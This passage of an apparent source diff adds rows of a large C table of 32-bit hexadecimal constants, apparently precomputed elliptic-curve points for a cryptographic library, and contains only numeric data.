UINT32_C(0x0E3A6FE5), UINT32_C(0xBA2A23E6), UINT32_C(0xD28B22C3), ++ UINT32_C(0x76CF674A), UINT32_C(0xF8B808C3), UINT32_C(0xD235AD07), ++ UINT32_C(0x6B71213A), UINT32_C(0x7BBF4C58), UINT32_C(0x93271EBB), ++ UINT32_C(0x0676792E), UINT32_C(0x05B1FC31), UINT32_C(0x2CFD2C76) } }, ++ { { UINT32_C(0x37A450F5), UINT32_C(0x4258E5C0), UINT32_C(0x52D2B118), ++ UINT32_C(0xC3245F1B), UINT32_C(0x82BC5963), UINT32_C(0x6DF7B484), ++ UINT32_C(0x9C273D1E), UINT32_C(0xE520DA4D), UINT32_C(0x2C3010E5), ++ UINT32_C(0xED78E012), UINT32_C(0x3C1D4C05), UINT32_C(0x11222948) }, ++ { UINT32_C(0xC692B490), UINT32_C(0xE3DAE5AF), UINT32_C(0xC197F793), ++ UINT32_C(0x3272BD10), UINT32_C(0xE709ACAA), UINT32_C(0xF7EAE411), ++ UINT32_C(0x778270A6), UINT32_C(0x00B0C95F), UINT32_C(0x220D4350), ++ UINT32_C(0x4DA76EE1), UINT32_C(0xAB71E308), UINT32_C(0x521E1461) } }, ++ { { UINT32_C(0x343196A3), UINT32_C(0x7B654323), UINT32_C(0xB0C95250), ++ UINT32_C(0x35D442AD), UINT32_C(0xE264FF17), UINT32_C(0x38AF50E6), ++ UINT32_C(0x2030D2EA), UINT32_C(0x28397A41), UINT32_C(0xF74EEDA1), ++ UINT32_C(0x8F1D84E9), UINT32_C(0xE6FB3C52), UINT32_C(0xD521F92D) }, ++ { UINT32_C(0x95733811), UINT32_C(0xAF358D77), UINT32_C(0x93ABFE94), ++ UINT32_C(0xEBFDDD01), UINT32_C(0xD18D99DE), UINT32_C(0x05D8A028), ++ UINT32_C(0xB5D5BDD9), UINT32_C(0x5A664019), UINT32_C(0x2AA12FE8), ++ UINT32_C(0x3DF17282), UINT32_C(0xB889A28E), UINT32_C(0xB42E006F) } }, ++ { { UINT32_C(0xBC35CB1A), UINT32_C(0xCF10E97D), UINT32_C(0x994DEDC5), ++ UINT32_C(0xC70A7BBD), UINT32_C(0x37D04FB9), UINT32_C(0x76A5327C), ++ UINT32_C(0xA76E0CDA), UINT32_C(0x87539F76), UINT32_C(0xCD60A6B1), ++ UINT32_C(0xE9FE493F), UINT32_C(0x132F01C0), UINT32_C(0xA4574796) }, ++ { UINT32_C(0xDB70B167), UINT32_C(0xC43B85EB), UINT32_C(0x98551DFA), ++ UINT32_C(0x81D5039A), UINT32_C(0x1D979FA4), UINT32_C(0x6B56FBE9), ++ UINT32_C(0x8615098F), UINT32_C(0x49714FD7), UINT32_C(0x94DECAB5), ++ UINT32_C(0xB10E1CEA), UINT32_C(0x480EF6E3), UINT32_C(0x8342EBA3) } }, ++ { { UINT32_C(0xB3677288), UINT32_C(0xE1E030B0), UINT32_C(0x8D5CE3AF), ++ UINT32_C(0x2978174C), UINT32_C(0xF7B2DE98), UINT32_C(0xAFC0271C), ++ UINT32_C(0xB99C20B5), UINT32_C(0x745BC6F3), UINT32_C(0x1E3BB4E5), ++ UINT32_C(0x9F6EDCED), UINT32_C(0x73C8C1FC), UINT32_C(0x58D3EE4E) }, ++ { UINT32_C(0x7FD30124), UINT32_C(0x1F3535F4), UINT32_C(0x5FA62502), ++ UINT32_C(0xF366AC70), UINT32_C(0x965363FE), UINT32_C(0x4C4C1FDD), ++ UINT32_C(0x1DE2CA2B), UINT32_C(0x8B2C7777), UINT32_C(0x882F1173), ++ UINT32_C(0x0CB54743), UINT32_C(0x71343331), UINT32_C(0x94B6B8C0) } }, ++ { { UINT32_C(0x65B8B35B), UINT32_C(0x75AF0141), UINT32_C(0x4670A1F5), ++ UINT32_C(0x6D7B8485), UINT32_C(0xA3B6D376), UINT32_C(0x6EAA3A47), ++ UINT32_C(0xCB3E5B66), UINT32_C(0xD7E673D2), UINT32_C(0x9589AB38), ++ UINT32_C(0xC0338E6C), UINT32_C(0x09440FAA), UINT32_C(0x4BE26CB3) }, ++ { UINT32_C(0x394F9AA3), UINT32_C(0x82CB05E7), UINT32_C(0x7F7792EA), ++ UINT32_C(0xC45C8A8A), UINT32_C(0xB687DC70), UINT32_C(0x37E5E33B), ++ UINT32_C(0xDFE48E49), UINT32_C(0x63853219), UINT32_C(0x6D0E5C8C), ++ UINT32_C(0x087951C1), UINT32_C(0x2BC27310), UINT32_C(0x7696A8C7) } }, ++ { { UINT32_C(0xB67E834A), UINT32_C(0xA05736D5), UINT32_C(0x9098D42A), ++ UINT32_C(0xDD2AA0F2), UINT32_C(0x49C69DDC), UINT32_C(0x09F0C1D8), ++ UINT32_C(0x8FF0F0F3), UINT32_C(0x81F8BC1C), UINT32_C(0x03037775), ++ UINT32_C(0x36FD3A4F), UINT32_C(0x4B06DF5C), UINT32_C(0x8286717D) }, ++ { UINT32_C(0xA9079EA2), UINT32_C(0xB878F496), UINT32_C(0xD7DC796D), ++ UINT32_C(0xA5642426), UINT32_C(0x67FDAC2B), UINT32_C(0x29B9351A), ++ UINT32_C(0x1D543CDE), UINT32_C(0x93774C0E), UINT32_C(0x1A8E31C4), ++ UINT32_C(0x4F8793BA), UINT32_C(0x6C94798A), UINT32_C(0x7C9F3F3A) } }, ++ { { UINT32_C(0xCB8ECDB8), UINT32_C(0x23C5AD11), UINT32_C(0x485A6A02), ++ UINT32_C(0x1E88D25E), UINT32_C(0xF1E268AE), UINT32_C(0xB27CBE84), ++ UINT32_C(0xF4CD0475), UINT32_C(0xDDA80238), UINT32_C(0x49F8EB1B), ++ UINT32_C(0x4F88857B), UINT32_C(0x52FB07F9), UINT32_C(0x91B1221F) }, ++ { UINT32_C(0x8637FA67), UINT32_C(0x7CE97460), UINT32_C(0x632198D8), ++ UINT32_C(0x528B3CF4), UINT32_C(0xF6623769), UINT32_C(0x33365AB3), ++ UINT32_C(0x3A83A30F), UINT32_C(0x6FEBCFFF), UINT32_C(0x9BD341EB), ++ UINT32_C(0x398F4C99), UINT32_C(0xB33A333C), UINT32_C(0x180712BB) } }, ++ { { UINT32_C(0xD93429E7), UINT32_C(0x2B8655A2), UINT32_C(0x75C8B9EE), ++ UINT32_C(0x99D600BB), UINT32_C(0x88FCA6CD), UINT32_C(0x9FC1AF8B), ++ UINT32_C(0x7C311F80), UINT32_C(0x2FB53386), UINT32_C(0xE8A71EEE), ++ UINT32_C(0x20743ECB), UINT32_C(0xE848B49E), UINT32_C(0xEC3713C4) }, ++ { UINT32_C(0xBB886817), UINT32_C(0x5B2037B5), UINT32_C(0x307DBAF4), ++ UINT32_C(0x40EF5AC2), UINT32_C(0x1B3F643D), UINT32_C(0xC2888AF2), ++ UINT32_C(0x9D5A4190), UINT32_C(0x0D8252E1), UINT32_C(0x2DB52A8A), ++ UINT32_C(0x06CC0BEC), UINT32_C(0xAB94E969), UINT32_C(0xB84B98EA) } }, ++ { { UINT32_C(0xA0321E0E), UINT32_C(0x2E7AC078), UINT32_C(0xEF3DAAB6), ++ UINT32_C(0x5C5A1168), UINT32_C(0xADDD454A), UINT32_C(0xD2D573CB), ++ UINT32_C(0x36259CC7), UINT32_C(0x27E149E2), UINT32_C(0xA63F47F1), ++ UINT32_C(0x1EDFD469), UINT32_C(0xF1BD2CFD), UINT32_C(0x039AD674) }, ++ { UINT32_C(0x3077D3CC), UINT32_C(0xBFA633FC), UINT32_C(0x2FD64E9F), ++ UINT32_C(0x14A7C82F), UINT32_C(0x9D824999), UINT32_C(0xAAA65014), ++ UINT32_C(0x21760F2E), UINT32_C(0x41AB113B), UINT32_C(0x1CAE260A), ++ UINT32_C(0x23E646C5), UINT32_C(0x68DC5159), UINT32_C(0x08062C8F) } }, ++ }, ++ { ++ { { UINT32_C(0x204BE028), UINT32_C(0x2E7D0A16), UINT32_C(0xD0E41851), ++ UINT32_C(0x4F1D082E), UINT32_C(0x3EB317F9), UINT32_C(0x15F1DDC6), ++ UINT32_C(0x5ADF71D7), UINT32_C(0xF0275071), UINT32_C(0xEE858BC3), ++ UINT32_C(0x2CE33C2E), UINT32_C(0xDA73B71A), UINT32_C(0xA24C76D1) }, ++ { UINT32_C(0x6C70C483), UINT32_C(0x9EF6A70A), UINT32_C(0x05CF9612), ++ UINT32_C(0xEFCF1705), UINT32_C(0x7502DE64), UINT32_C(0x9F5BF5A6), ++ UINT32_C(0xA4701973), UINT32_C(0xD11122A1), UINT32_C(0xA2EA7B24), ++ UINT32_C(0x82CFAAC2), UINT32_C(0x0A4582E1), UINT32_C(0x6CAD67CC) } }, ++ { { UINT32_C(0xB4DC8600), UINT32_C(0x597A26FF), UINT32_C(0xF9288555), ++ UINT32_C(0x264A09F3), UINT32_C(0x5C27F5F6), UINT32_C(0x0B06AFF6), ++ UINT32_C(0xD8D544E6), UINT32_C(0xCE5AB665), UINT32_C(0x99275C32), ++ UINT32_C(0x92F031BE), UINT32_C(0xF42E0E7C), UINT32_C(0xAF51C5BB) }, ++ { UINT32_C(0x1E37B36D), UINT32_C(0x5BB28B06), UINT32_C(0x8473543A), ++ UINT32_C(0x583FBA6A), UINT32_C(0xF93FB7DC), UINT32_C(0xE73FD299), ++ UINT32_C(0x6E2CCAD9), UINT32_C(0xFCD999A8), UINT32_C(0x334D4F57), ++ UINT32_C(0xB8C8A6DF), UINT32_C(0x9A2ACC9B), UINT32_C(0x5ADB28DD) } }, ++ { { UINT32_C(0x111792B9), UINT32_C(0x5ADF3D9A), UINT32_C(0x4F1E0D09), ++ UINT32_C(0x1C77A305), UINT32_C(0xA82D3736), UINT32_C(0xF9FBCE33), ++ UINT32_C(0x718C8AA3), UINT32_C(0xF307823E), UINT32_C(0x416CCF69), ++ UINT32_C(0x860578CF), UINT32_C(0x1EF8465B), UINT32_C(0xB942ADD8) }, ++ { UINT32_C(0xCD9472E1), UINT32_C(0x9EE0CF97), UINT32_C(0xB01528A8), ++ UINT32_C(0xE6792EEF), UINT32_C(0xC09DA90B), UINT32_C(0xF99B9A8D), ++ UINT32_C(0xCBF3CCB8), UINT32_C(0x1F521C2D), UINT32_C(0x91A62632), ++ UINT32_C(0x6BF66948), UINT32_C(0x854FE9DA), UINT32_C(0xCC7A9CEB) } }, ++ { { UINT32_C(0x491CCB92), UINT32_C(0x46303171), UINT32_C(0x2771235B), ++ UINT32_C(0xA80A8C0D), UINT32_C(0xF172C7CF), UINT32_C(0xD8E497FF), ++ UINT32_C(0x35B193CF), UINT32_C(0x7F7009D7), UINT32_C(0xF19DF4BC), ++ UINT32_C(0x6B9FD3F7), UINT32_C(0xB46F1E37), UINT32_C(0xADA548C3) }, ++ { UINT32_C(0xC7A20270), UINT32_C(0x87C6EAA9), UINT32_C(0xAE78EF99), ++ UINT32_C(0xEF2245D6), UINT32_C(0x539EAB95), UINT32_C(0x2A121042), ++ UINT32_C(0x79B8F5CC), UINT32_C(0x29A6D5D7), UINT32_C(0xB77840DC), ++ UINT32_C(0x33803A10), UINT32_C(0x11A6A30F), UINT32_C(0xFEDD3A70) } }, ++ { { UINT32_C(0x142403D1), UINT32_C(0xFA070E22), UINT32_C(0x15C6F7F5), ++ UINT32_C(0x68FF3160), UINT32_C(0x223A0CE8), UINT32_C(0xE09F04E6), ++ UINT32_C(0x53E14183), UINT32_C(0x22BBD018), UINT32_C(0xCF45B75B), ++ UINT32_C(0x35D9FAFC), UINT32_C(0x7ECEEC88), UINT32_C(0x3A34819D) }, ++ { UINT32_C(0xD33262D2), UINT32_C(0xD9CF7568), UINT32_C(0x841D1505), ++ UINT32_C(0x431036D5), UINT32_C(0x9EB2A79A), UINT32_C(0x0C800565), ++ UINT32_C(0x5F7EDC6A), UINT32_C(0x8E77D9F0), UINT32_C(0x65E800AA), ++ UINT32_C(0x19E12D05), UINT32_C(0xB7784E7C), UINT32_C(0x335C8D36) } }, ++ { { UINT32_C(0x6484FD40), UINT32_C(0x8B2FC4E9), UINT32_C(0xA35D24EA), ++ UINT32_C(0xEE702764), UINT32_C(0xB871C3F3), UINT32_C(0x15B28AC7), ++ UINT32_C(0xE097047F), UINT32_C(0x805B4048), UINT32_C(0x647CAD2F), ++ UINT32_C(0xD6F1B8DF), UINT32_C(0xDC7DD67F), UINT32_C(0xF1D5B458) }, ++ { UINT32_C(0x25148803), UINT32_C(0x324C529C), UINT32_C(0x21274FAF), ++ UINT32_C(0xF6185EBE), UINT32_C(0x95148B55), UINT32_C(0xAF14751E), ++ UINT32_C(0x28F284F4), UINT32_C(0x283ED89D), UINT32_C(0x4CBEBF1A), ++ UINT32_C(0x93AD20E7), UINT32_C(0x882935E1), UINT32_C(0x5F6EC65D) } }, ++ { { UINT32_C(0xA4DCEFE9), UINT32_C(0xE222EBA4), UINT32_C(0xEC1CEB74), ++ UINT32_C(0x63AD235F), UINT32_C(0xE05B18E7), UINT32_C(0x2E0BF749), ++ UINT32_C(0xB48BDD87), UINT32_C(0x547BD050), UINT32_C(0xF5AA2FC4), ++ UINT32_C(0x0490C970), UINT32_C(0x2B431390), UINT32_C(0xCED5E4CF) }, ++ { UINT32_C(0x51D2898E), UINT32_C(0x07D82704), UINT32_C(0x083B57D4), ++ UINT32_C(0x44B72442), UINT32_C(0x5037FCE8), UINT32_C(0xA4ADA230), ++ UINT32_C(0x50510DA6), UINT32_C(0x55F7905E), UINT32_C(0x8D890A98), ++ UINT32_C(0xD8EE724F), UINT32_C(0x11B85640), UINT32_C(0x925A8E7C) } }, ++ { { UINT32_C(0x1CA459ED), UINT32_C(0x5BFA10CD), UINT32_C(0x6DCF56BF), ++ UINT32_C(0x593F085A), UINT32_C(0xC0579C3E), UINT32_C(0xE6F0AD9B), ++ UINT32_C(0x2527C1AD), UINT32_C(0xC11C95A2), UINT32_C(0xCF1CB8B3), ++ UINT32_C(0x7CFA71E1), UINT32_C(0x1D6DC79D), UINT32_C(0xEDCFF833) }, ++ { UINT32_C(0x432521C9), UINT32_C(0x581C4BBE), UINT32_C(0x144E11A0), ++ UINT32_C(0xBF620096), UINT32_C(0xBE3A107B), UINT32_C(0x54C38B71), ++ UINT32_C(0xE2606EC0), UINT32_C(0xED555E37), UINT32_C(0xD721D034), ++ UINT32_C(0x3FB148B8), UINT32_C(0x0091BC90), UINT32_C(0x79D53DAD) } }, ++ { { UINT32_C(0xB7082C80), UINT32_C(0xE32068C5), UINT32_C(0x7A144E22), ++ UINT32_C(0x4140FFD2), UINT32_C(0x9EDD9E86), UINT32_C(0x5811D2F0), ++ UINT32_C(0xC572C465), UINT32_C(0xCDD79B5F), UINT32_C(0xC97BF450), ++ UINT32_C(0x3563FED1), UINT32_C(0xF2CE5C9C), UINT32_C(0x985C1444) }, ++ { UINT32_C(0x99950F1C), UINT32_C(0x260AE797), UINT32_C(0x765E9DED), ++ UINT32_C(0x659F4F40), UINT32_C(0x2E3BC286), UINT32_C(0x2A412D66), ++ UINT32_C(0xF87E0C82), UINT32_C(0xE865E62C), UINT32_C(0x6C05E7D7), ++ UINT32_C(0xD63D3A9A), UINT32_C(0x8686F89A), UINT32_C(0x96725D67) } }, ++ { { UINT32_C(0xAB7EA0F5), UINT32_C(0xC99A5E4C), UINT32_C(0xC5393FA9), ++ UINT32_C(0xC9860A1A), UINT32_C(0x8FDEEFC0), UINT32_C(0x9ED83CEE), ++ UINT32_C(0x5ED6869A), UINT32_C(0xE3EA8B4C), UINT32_C(0xD2EED3A9), ++ UINT32_C(0x89A85463), UINT32_C(0xE421A622), UINT32_C(0x2CD91B6D) }, ++ { UINT32_C(0x2C91C41D), UINT32_C(0x6FEC1EF3), UINT32_C(0x8171037D), ++ UINT32_C(0xB1540D1F), UINT32_C(0x1C010E5B), UINT32_C(0x4FE4991A), ++ UINT32_C(0xFC1C7368), UINT32_C(0x28A3469F), UINT32_C(0xAF118781), ++ UINT32_C(0xE1EEECD1), UINT32_C(0x99EF3531), UINT32_C(0x1BCCB977) } }, ++ { { UINT32_C(0xC4DAB7B8), UINT32_C(0x63D3B638), UINT32_C(0x3F7F5BAB), ++ UINT32_C(0xD92133B6), UINT32_C(0x09FB6069), UINT32_C(0x2573EE20), ++ UINT32_C(0x890A1686), UINT32_C(0x771FABDF), UINT32_C(0xA77AFFF5), ++ UINT32_C(0x1D0BA21F), UINT32_C(0xBA3DD2C0), UINT32_C(0x83145FCC) }, ++ { UINT32_C(0x2D115C20), UINT32_C(0xFA073A81), UINT32_C(0x19176F27), ++ UINT32_C(0x6AB7A9D3), UINT32_C(0x9AC639EE), UINT32_C(0xAF62CF93), ++ UINT32_C(0x2CCD1319), UINT32_C(0xF73848B9), UINT32_C(0x3C71659D), ++ UINT32_C(0x3B613234), UINT32_C(0x10AB3826), UINT32_C(0xF8E0011C) } }, ++ { { UINT32_C(0x0282FFA5), UINT32_C(0x0501F036), UINT32_C(0xD9E0F15A), ++ UINT32_C(0xC39A5CF4), UINT32_C(0x9A3D1F3C), UINT32_C(0x48D8C729), ++ UINT32_C(0x64E18EDA), UINT32_C(0xB5FC136B), UINT32_C(0x7E58FEF0), ++ UINT32_C(0xE81B53D9), UINT32_C(0xF7B0F28D), UINT32_C(0x0D534055) }, ++ { UINT32_C(0x7A80619B), UINT32_C(0x47B8DE12), UINT32_C(0x81F9E55D), ++ UINT32_C(0x60E2A2B3), UINT32_C(0xCF564CC5), UINT32_C(0x6E9624D7), ++ UINT32_C(0x6BDEDFFF), UINT32_C(0xFDF18A21), UINT32_C(0xC0D5FC82), ++ UINT32_C(0x3787DE38), UINT32_C(0x497A6B11), UINT32_C(0xCBCAA347) } }, ++ { { UINT32_C(0xB226465A), UINT32_C(0x6E7EF35E), UINT32_C(0x5F8A2BAF), ++ UINT32_C(0x4B469919), UINT32_C(0x1120D93F), UINT32_C(0x44B3A3CF), ++ UINT32_C(0x68F34AD1), UINT32_C(0xB052C8B6), UINT32_C(0xEF7632DD), ++ UINT32_C(0x27EC574B), UINT32_C(0x685DE26F), UINT32_C(0xAEBEA108) }, ++ { UINT32_C(0xE39424B6), UINT32_C(0xDA33236B), UINT32_C(0xEBCC22AD), ++ UINT32_C(0xB1BD94A9), UINT32_C(0x2CDFB5D5), UINT32_C(0x6DDEE6CC), ++ UINT32_C(0x6F14069A), UINT32_C(0xBDAED927), UINT32_C(0x2A247CB7), ++ UINT32_C(0x2ADE427C), UINT32_C(0xED156A40), UINT32_C(0xCE96B436) } }, ++ { { UINT32_C(0x81F3F819), UINT32_C(0xDDDCA360), UINT32_C(0xD419B96A), ++ UINT32_C(0x4AF4A49F), UINT32_C(0x7CB966B9), UINT32_C(0x746C6525), ++ UINT32_C(0x6F610023), UINT32_C(0x01E39088), UINT32_C(0x98DD33FC), ++ UINT32_C(0x05ECB38D), UINT32_C(0x8F84EDF4), UINT32_C(0x962B971B) }, ++ { UINT32_C(0x6A6F2602), UINT32_C(0xEB32C0A5), UINT32_C(0x562D60F2), ++ UINT32_C(0xF026AF71), UINT32_C(0x84615FAB), UINT32_C(0xA9E246BF), ++ UINT32_C(0x75DBAE01), UINT32_C(0xAD967092), UINT32_C(0x3ECE5D07), ++ UINT32_C(0xBF97C79B), UINT32_C(0x74EAA3D3), UINT32_C(0xE06266C7) } }, ++ { { UINT32_C(0x2E6DBB6E), UINT32_C(0x161A0157), UINT32_C(0x60FA8F47), ++ UINT32_C(0xB8AF4904), UINT32_C(0x00197F22), UINT32_C(0xE4336C44), ++ UINT32_C(0x9CEDCE0E), UINT32_C(0xF811AFFA), UINT32_C(0xF94C2EF1), ++ UINT32_C(0xB1DD7685), UINT32_C(0xCA957BB0), UINT32_C(0xEEDC0F4B) }, ++ { UINT32_C(0x4AA76BB1), UINT32_C(0xD319FD57), UINT32_C(0x16CD7CCB), ++ UINT32_C(0xB3525D7C), UINT32_C(0xA97DD072), UINT32_C(0x7B22DA9C), ++ UINT32_C(0x38A83E71), UINT32_C(0x99DB84BD), UINT32_C(0xC0EDD8BE), ++ UINT32_C(0x4939BC8D), UINT32_C(0x903A932C), UINT32_C(0x06D524EA) } }, ++ { { UINT32_C(0x0E31F639), UINT32_C(0x4BC950EC), UINT32_C(0x6016BE30), ++ UINT32_C(0xB7ABD3DC), UINT32_C(0x6703DAD0), UINT32_C(0x3B0F4473), ++ UINT32_C(0x0AC1C4EA), UINT32_C(0xCC405F8B), UINT32_C(0x176C3FEE), ++ UINT32_C(0x9BED5E57), UINT32_C(0x36AE36C2), UINT32_C(0xF4524810) }, ++ { UINT32_C(0x15D7B503), UINT32_C(0xC1EDBB83), UINT32_C(0xE30F3657), ++ UINT32_C(0x943B1156), UINT32_C(0x98377805), UINT32_C(0x984E9EEF), ++ UINT32_C(0x36CF1DEB), UINT32_C(0x291AE7AC), UINT32_C(0xA9F66DF3), ++ UINT32_C(0xFED8748C), UINT32_C(0xFEA8FA5D), UINT32_C(0xECA758BB) } }, ++ }, ++ { ++ { { UINT32_C(0x2DD1B249), UINT32_C(0xACC787EF), UINT32_C(0xD82976F1), ++ UINT32_C(0x736E1030), UINT32_C(0xA01B3649), UINT32_C(0x0A6940FA), ++ UINT32_C(0xC42341E7), UINT32_C(0xE00B926B), UINT32_C(0xDE8FFD6C), ++ UINT32_C(0x911508D0), UINT32_C(0x5276B0CB), UINT32_C(0x4DCF8D46) }, ++ { UINT32_C(0xCC3CAD8D), UINT32_C(0x23AD0A90), UINT32_C(0xADED962A), ++ UINT32_C(0x2A92E54C), UINT32_C(0xF231BFAF), UINT32_C(0x93FBEC4D), ++ UINT32_C(0x4798987A), UINT32_C(0x9544BC77), UINT32_C(0x08E29F60), ++ UINT32_C(0x48084E25), UINT32_C(0x32DE5869), UINT32_C(0x0C0D2F43) } }, ++ { { UINT32_C(0x3A9ABC13), UINT32_C(0x6778F970), UINT32_C(0x3D2B166B), ++ UINT32_C(0xFD014FAC), UINT32_C(0x3C6FED60), UINT32_C(0x1FE4FC78), ++ UINT32_C(0xAA7C69C5), UINT32_C(0x04295FA8), UINT32_C(0x7C123175), ++ UINT32_C(0xA01DE56D), UINT32_C(0x3D9A713A), UINT32_C(0x0FA0D3A8) }, ++ { UINT32_C(0xE3E08ADD), UINT32_C(0xA7A6E5E3), UINT32_C(0x1AC58F85), ++ UINT32_C(0xBD77E94B), UINT32_C(0xB7321A9C), UINT32_C(0x078F6FD2), ++ UINT32_C(0x911EF6D9), UINT32_C(0x9564601E), UINT32_C(0x415C6BEF), ++ UINT32_C(0x31C5C1B2), UINT32_C(0xD3212C62), UINT32_C(0xE6C0C91E) } }, ++ { { UINT32_C(0x0D16022F), UINT32_C(0xBA7BD23C), UINT32_C(0x198BE288), ++ UINT32_C(0xE9CF4750), UINT32_C(0x47DEEC65), UINT32_C(0x304E3169), ++ UINT32_C(0x96EEB288), UINT32_C(0xCF65B41F), UINT32_C(0x927E9E3B), ++ UINT32_C(0x17E99C17), UINT32_C(0xF6630A80), UINT32_C(0x82225546) }, ++ { UINT32_C(0xCA067BD9), UINT32_C(0x15122B8A), UINT32_C(0xB77B4E98), ++ UINT32_C(0xE2673205), UINT32_C(0x9407CA63), UINT32_C(0x13037565), ++ UINT32_C(0x8B621602), UINT32_C(0x53624F54), UINT32_C(0xEAE4BD06), ++ UINT32_C(0x96AF2CB1), UINT32_C(0x8FA20829), UINT32_C(0x576ECD1C) } }, ++ { { UINT32_C(0x7E02D2D0), UINT32_C(0xA551CE10), UINT32_C(0x9D13DBC7), ++ UINT32_C(0x1584ED24), UINT32_C(0x4DA7B6D8), UINT32_C(0x082017AD), ++ UINT32_C(0xE054BC48), UINT32_C(0x81918A8F), UINT32_C(0x572DC384), ++ UINT32_C(0x677DB48E), UINT32_C(0x6155484C), UINT32_C(0x2EF82296) }, ++ { UINT32_C(0x41B9C231), UINT32_C(0xC3DB14C6), UINT32_C(0x4A766192), ++ UINT32_C(0x910A87D1), UINT32_C(0x10AB8E0F), UINT32_C(0x93D5CC86), ++ UINT32_C(0xAE57CA1B), UINT32_C(0x4194D548), UINT32_C(0x267FC37A), ++ UINT32_C(0xFAF3A1D6), UINT32_C(0x13B87C97), UINT32_C(0x70EC2364) } }, ++ { { UINT32_C(0x5E12756A), UINT32_C(0x064B565B), UINT32_C(0xAE49C98E), ++ UINT32_C(0x953B7BD1), UINT32_C(0xF7001D91), UINT32_C(0xE0CE8284), ++ UINT32_C(0xF31108D0), UINT32_C(0x1546060B), UINT32_C(0x6779B6E2), ++ UINT32_C(0xDBC2C3F4), UINT32_C(0xE0DD07CF), UINT32_C(0x157AA47D) }, ++ { UINT32_C(0xF23B261E), UINT32_C(0xBF4A1C6F), UINT32_C(0x654F4BE5), ++ UINT32_C(0x5B8EED30), UINT32_C(0x6B20CCD8), UINT32_C(0xDF5896D3), ++ UINT32_C(0x559ED23D), UINT32_C(0x56920E2C), UINT32_C(0xFA6E3E27), ++ UINT32_C(0x901F342E), UINT32_C(0x896CA082), UINT32_C(0x745C747C) } }, ++ { { UINT32_C(0x2944EC84), UINT32_C(0xDBCCD575), UINT32_C(0xA5FF65FE), ++ UINT32_C(0x54A2A935), UINT32_C(0x1A1319B6), UINT32_C(0x88C92A5E), ++ UINT32_C(0x82DA96C1), UINT32_C(0x9537C28F), UINT32_C(0x35F93C46), ++ UINT32_C(0xB6836474), UINT32_C(0x65B0846C), UINT32_C(0xEC526A1D) }, ++ { UINT32_C(0xF382C412), UINT32_C(0x6F12AFBD), UINT32_C(0x9E99FA06), ++ UINT32_C(0x5EBC81D8), UINT32_C(0x869B93BD), UINT32_C(0x97B5D672), ++ UINT32_C(0x377E12AA), UINT32_C(0x2983C310), UINT32_C(0x24D681EA), ++ UINT32_C(0x48759681), UINT32_C(0x287FD767), UINT32_C(0x1E0BD106) } }, ++ { { UINT32_C(0x7231247F), UINT32_C(0x0AC75A3E), UINT32_C(0xEF27AD3A), ++ UINT32_C(0x65C20DE6), UINT32_C(0xBD02EEE5), UINT32_C(0x87EB6CF1), ++ UINT32_C(0x00147E03), UINT32_C(0x264ACA7A), UINT32_C(0xAE2A9437), ++ UINT32_C(0xEBC78581), UINT32_C(0x6316BFA5), UINT32_C(0x9929964E) }, ++ { UINT32_C(0x9AF207EF), UINT32_C(0xDC09E040), UINT32_C(0x0C9D8658), ++ UINT32_C(0x3ECFFE2D), UINT32_C(0xDFB43D38), UINT32_C(0x547EA735), ++ UINT32_C(0xD04B1B20), UINT32_C(0x5485247B), UINT32_C(0xBFD8B609), ++ UINT32_C(0xB18D3F02), UINT32_C(0xCCE73705), UINT32_C(0xEEB3E805) } }, ++ { { UINT32_C(0xDB93850F), UINT32_C(0xDAB1A525), UINT32_C(0x8365B7D5), ++ UINT32_C(0x18ADAA23), UINT32_C(0x113FC8C7), UINT32_C(0x58485C90), ++ UINT32_C(0x348AD323), UINT32_C(0x80C3DBB9), UINT32_C(0xE16ADCA1), ++ UINT32_C(0xAF892FB5), UINT32_C(0x979F005A), UINT32_C(0x2183C879) }, ++ { UINT32_C(0x0643A99E), UINT32_C(0x20FA1A94), UINT32_C(0x1A1609CB), ++ UINT32_C(0x2741221C), UINT32_C(0x3C2FBDDC), UINT32_C(0x1C1687E5), ++ UINT32_C(0xD420D6CF), UINT32_C(0xDCCF329E), UINT32_C(0x2B7197D1), ++ UINT32_C(0x75D5577D), UINT32_C(0xC8729D9C), UINT32_C(0x4C3C3875) } }, ++ { { UINT32_C(0xE5CBDCB9), UINT32_C(0x5E79F995), UINT32_C(0xA742FCC7), ++ UINT32_C(0x03139824), UINT32_C(0x239EF4A1), UINT32_C(0x6D0C214A), ++ UINT32_C(0x401A2944), UINT32_C(0x53A27952), UINT32_C(0xC10BCDF0), ++ UINT32_C(0xF42A1B34), UINT32_C(0x7CF38061), UINT32_C(0x426BAA43) }, ++ { UINT32_C(0xA96AD0C8), UINT32_C(0x16A53139), UINT32_C(0x6BAD5301), ++ UINT32_C(0x627F1D31), UINT32_C(0x4ACCD627), UINT32_C(0x5AF74877), ++ UINT32_C(0xB55B0FB8), UINT32_C(0x3C58A1C5), UINT32_C(0xF4399A6A), ++ UINT32_C(0xFAA57B91), UINT32_C(0xC28094B8), UINT32_C(0xBAD283FB) } }, ++ { { UINT32_C(0x83E10A93), UINT32_C(0xBA32AC61), UINT32_C(0xEC06BDB0), ++ UINT32_C(0x1C91F6B4), UINT32_C(0x65F60C93), UINT32_C(0x42E6CFBC), ++ UINT32_C(0x2C0CDCBE), UINT32_C(0xEFE33BC8), UINT32_C(0x4D6414F2), ++ UINT32_C(0xE0FE1D09), UINT32_C(0x76FA5C5B), UINT32_C(0x4C112316) }, ++ { UINT32_C(0x2E26200A), UINT32_C(0x812C1DC6), UINT32_C(0xEE879D25), ++ UINT32_C(0xD6C413C5), UINT32_C(0xBCA8BAFE), UINT32_C(0xBEADE255), ++ UINT32_C(0xCE2BA0E7), UINT32_C(0x0EAF4AE2), UINT32_C(0xC4F4408A), ++ UINT32_C(0x66E9FFB0), UINT32_C(0x9782C7AD), UINT32_C(0xB36A86D7) } }, ++ { { UINT32_C(0xBAD8D1C7), UINT32_C(0x10FCD1F4), UINT32_C(0x4502F645), ++ UINT32_C(0xC903816A), UINT32_C(0xA503B895), UINT32_C(0x7FAC1CC1), ++ UINT32_C(0x0778900C), UINT32_C(0x8BCD6041), UINT32_C(0x5BCF2784), ++ UINT32_C(0x5A5F2202), UINT32_C(0x10EDB896), UINT32_C(0x9B157E87) }, ++ { UINT32_C(0xF602A8B1), UINT32_C(0x4C58DA69), UINT32_C(0x59EC9D7E), ++ UINT32_C(0xD55132F8), UINT32_C(0xA26D4870), UINT32_C(0x155B719A), ++ UINT32_C(0x36441746), UINT32_C(0x25AAFCA3), UINT32_C(0xDD3B6B30), ++ UINT32_C(0x01F83338), UINT32_C(0x551917CC), UINT32_C(0xD52BB5C1) } }, ++ { { UINT32_C(0x6135066A), UINT32_C(0xA0B6207B), 